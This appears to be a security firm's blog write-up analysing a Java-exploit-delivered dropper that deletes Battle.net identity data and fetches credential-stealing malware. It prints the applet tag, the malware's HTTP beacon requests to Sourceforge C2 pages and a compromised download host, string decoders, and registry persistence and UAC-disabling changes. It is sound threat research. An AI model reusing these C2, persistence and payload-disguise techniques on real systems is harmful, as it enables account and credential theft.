Police? Yes, I lost my lvl 100 mage...
I recently came across an interesting sample being spread through Java exploits in the wild which appeared to do nothing more than download some additional credential stealing/account harvesting malware and delete a victim s Battle.net account information. It seems the author has a bone to pick with Korean gamers for whatever reason based upon targeting, but my current conjecture is it s probably because of their epic dominance of StarCraft. Battle.net accounts are also used in other large popular online games including Diablo III and World of Warcraft both of which have substantial online economies built around them where players can buy and sell equipment and resources using actual currency. The interesting aspect of these particular samples is the use of Sourceforge account pages as a means of command and control in addition to public blog sites. The nationality of the author is speculative based off of Chinese language resources in 2nd stage payloads as well as the username gao200511. gao200511 was used in one of the very first Sourceforge C2 s and the email address firstname.lastname@example.org was used to make several posts in association with a well-known Chinese hacking group, Ph4nt0m.
The exploit used an embedded malicious Java applet in the HTML, which upon successful exploitation will execute a binary stored as a byte array within the same page. Upon successful exploitation the binary will be written to the user s %temp% folder with the name rund11.exe and executed.
<applet archive="game.jar" code="MainCls.class" width="0" height="0"> <param name="datas" value="4D5A900003 " />
File Size: 53,760 Bytes
File System Changes:
- %systemroot%\system32\test.dat (deleted)
Note: test.dat is used to test write permission to the system directory
- %temp%\rund11.exe (deleted)
- HKLM\Software\Microsoft\Windows\Help\Help Version (Encoded C2)
- HKCU\Software\Microsoft\Windows\CurrentVersion\Run\AhnLab V3Lite Update Process
- HKLM\Software\Blizzard Entertainment\Battle.net\Identity (Deletes this Key if Present)
- HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin -> 0 (Vista and Above)
- Registry Run Key in the Current User s Profile:
- HKCU\Software\Microsoft\Windows\CurrentVersion\Run\AhnLab V3Lite Update Process which points to %temp%\v3liverun.exe
The binary employs a simple ordinal encoding to obfuscate C2 information and other API functions, which would potentially trigger AV heuristics. The python function below can be used to decode these strings.
def decode_easy(st): out = '' for i in range(0,len(st)/3): num = st[(i*3):(i*3)+3] out += chr(int(num)) return out
Figure 1: Python Script to Decode Strings in Binary
For example, using the script above on the following string104116116112115058047047115111117114099101102111114103101046110101116047117115101114115047110101119045119111114108100 decodes to https://sourceforge.net/users/new-world. Once rund11.exe is executed it checks for Internet connectivity by making a TCP connection towww.naver.com. If successful the binary will then connect to the C2,https://sourceforge.net/users/new-world, using standard HTTPS on TCP port 443. It also makes the same request over HTTP using a static User-Agent Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322).
GET /users/new-world HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Connection: Keep-Alive Cache-Control: no-cache Host: sourceforge.net
Figure 2: HTTP Request to "sourceforge.net"
The page retrieved will look something like the screenshot below:
The malware checks the <title> tag within the returned HTML and will decode this string for an additional website to contact. The following python snippet can be used to decode the command above:
def decode_url(st): out = '' for i in st: i = ord(i) if i == 0x59: out += chr(0x2E) elif i == 0x58: out += chr(0x2F) else: if i < 0x76: new = i + 0x5 else: new = i - 0x15 out += chr(new) return out
Figure 3: Python Snippet to Decode Embedded Instructions
Using the decode script above on the string rrrYvkmdghpndxYxjhXuYbda yields the website,www.aprilmusic.com/z.gif. It also stores the encoded value retrieved from the page in the registry key HKLM\SOFTWARE\Microsoft\Windows\Help\Help Version. The malware will then connect to this website and download, decode, and execute the file. The z.gif file was actually an executable encoded by a single byte XOR against the key 0x95 and renamed with a GIF extension. This particular sample also connected to kooor1.blogspot.kr on TCP port 80 after the initial check in using a hardcoded User-Agent. This site appears to be some kind of simple counter used by the attackers as no content resided on the webpage.
GET /2013/03/kor.html?m=1 HTTP/1.0 User-Agent: Mozilla/5.0 (iPhone:U;CPU iPhone OS 4_1 like Mac OS X;zh-cn) AppleWebKit/532.9(KHTML,like Gecko)Version/4.0.5 Mobile/8B117 Safari/6531.22.7 Host: kooor1.blogspot.kr Pragma: no-cache
Figure 4: Additional HTTP Request Sent by the Malware
The rund11.exe will copy itself to the location %temp%\v3liverun.exe and delete itself after successful communication with the C2. It also creates a simple Run Key under the name, AhnLab V3Lite Update Process, in the current user s profile to establish persistence.
File Size: 189,952 Bytes
MD5 After XOR: F77B6F92909FB7B9F223279D76DE49BE
File Size: 145,408 Bytes
MD5 After XOR: 85A4A9CF756B751A1C986CEE76485929
Numerous other binaries were also stored on the compromised aprilmusic.com website as one letter GIF files. The site appears to be a legitimate Korean audio equipment dealer. It should also be noted that between the time of initial analysis and this write-up the command was also changed torrrYvkmdghpndxYxjhXtYbda which decodes to www.aprilmusic.com/y.gif. The two binaries were substantially different. z.gif dropped a keylogger implemented as a kernel driver that was only activated once a user visited specific websites while y.gif dropped a browser helper object that harvested credentials from Paypal, MtGox (bitcoin), and two popular online game trading platforms. Cylance Labs is continuing to investigate and will post any interesting details as they arise.
Prior C2 Information
Sourceforge.net C2 Pages:
All of these user accounts have been shut down by Sourceforge at the time of this write-up, but were actively used in similar samples in the past as well as the following blog sites:
Blog Page Counters:
Additional Encoded GIF Malware Sites: